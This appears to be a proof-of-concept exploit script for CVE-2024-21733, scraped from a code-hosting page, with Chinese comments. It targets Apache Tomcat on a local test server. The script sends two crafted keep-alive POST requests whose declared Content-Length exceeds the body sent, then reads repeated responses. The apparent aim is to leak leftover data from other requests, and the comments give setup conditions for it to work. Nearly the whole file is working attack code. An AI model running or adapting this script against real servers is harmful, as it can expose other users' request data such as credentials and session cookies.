-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathCVE-2024-21733.py
93 lines (86 loc) · 2.85 KB
/
CVE-2024-21733.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
import socket
# 服务器地址和端口
server_address = ('127.0.0.1', 8080)
# 创建一个 TCP/IP 套接字
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# 连接到服务器
sock.connect(server_address)
#构造vulnerable.jsp内容
#内容如下
#注意1:第二个POST请求需要等待超时才能触发返回,默认20秒
#注意2:tomcat语言环境需为英语 -Duser.language=en -Duser.country=US
'''
< %
// 获取GET请求中的参数id
String
id = request.getParameter("id");
// 打印出id的值
if (id != null) {
out.println("The ID is: " + id);
} else {
out.println("No ID parameter provided.");
}
% >
'''
request_headers = (
"POST /vulnerable.jsp HTTP/1.1\r\n"
"Host: localhost\r\n"
"Connection: keep-alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 48\r\n" # 实际发送的内容将少于100字节
"\r\n"
)
incomplete_body = "id=123456789123456789123456789123456789123456789"
# 发送请求头部
sock.sendall(request_headers.encode('utf-8'))
sock.sendall(incomplete_body.encode('utf-8'))
response = sock.recv(2048)
print(f"Received response1:\n{response.decode('utf-8')}")
request_headers = (
"POST /vulnerable.jsp HTTP/1.1\r\n"
"Host: localhost\r\n"
"Connection: keep-alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 35\r\n"
"\r\n"
)
incomplete_body = "incomplete_data=00000000000"
sock.sendall(request_headers.encode('utf-8'))
sock.sendall(incomplete_body.encode('utf-8'))
response = sock.recv(2048)
print(f"Received response2:\n{response.decode('utf-8')}")
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
print(response.decode('utf-8'))
response = sock.recv(2048)
except Exception as e:
print(f"An error occurred: {e}")
finally:
# 确保套接字关闭
sock.close()